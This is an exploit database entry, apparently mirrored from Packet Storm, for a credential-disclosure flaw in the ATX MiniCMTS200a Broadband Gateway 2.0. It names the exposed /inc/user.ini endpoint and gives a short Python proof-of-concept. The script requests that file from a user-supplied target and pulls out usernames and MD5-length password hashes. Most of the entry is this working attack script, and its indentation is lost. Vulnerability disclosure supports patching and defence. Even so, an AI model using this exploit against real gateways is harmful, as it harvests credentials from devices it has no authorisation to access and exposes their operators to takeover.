Lucene search
K

ATX MiniCMTS200a Broadband Gateway 2.0 Credential Disclosure

🗓️ 30 Nov 2020 00:00:00Reported by Zagros BingolType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 541 Views

ATX MiniCMTS200a Broadband Gateway 2.0 Credential Disclosure on Debian 10 64bi

Code
`# Exploit Title: ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure  
# Date: 2020-11-20  
# Exploit Author: Zagros Bingol  
# Vendor Homepage: http://www.atx.com  
# Software Link: https://atx.com/products/commercial-services-gateways/minicmts200a-broadband-gateway/  
# Version: 2.0 and earlier  
# Tested on: Debian 10 64bit  
  
-------------------------------------  
  
Endpoint:  
http://www.ip/domain.com/inc/user.ini  
  
--------------------------------------  
  
Proof-of-Concept:  
  
#!/usr/bin/python3  
#License: GNU General Public license v3.0  
#Author: Zagros Bingol([email protected])  
  
  
import requests  
import re  
  
target = input("Target(ex:http://host): \n")  
port = input("Port: \n")  
  
  
def sploit(target, port):  
print("ATX/PicoDigital MiniCMTS200a Broadband Gateway v2.0 -  
Credential Disclosure\n")  
r = requests.post(target + ":" + port + '/inc/user.ini')  
searching = re.findall(r"\[.{1,8}\]", str(r.text))  
print("Usernames:\n")  
print(", ".join(searching).replace("[", "").replace("]", ""))  
  
def hash():  
r = requests.post(target + '/inc/user.ini')  
searching = re.findall(r"([a-fA-F\d]{32})", str(r.text))  
print("Hashes:\n")  
print(", ".join(searching).replace("[", "").replace("]", ""))  
hash()  
  
sploit(target, port)  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation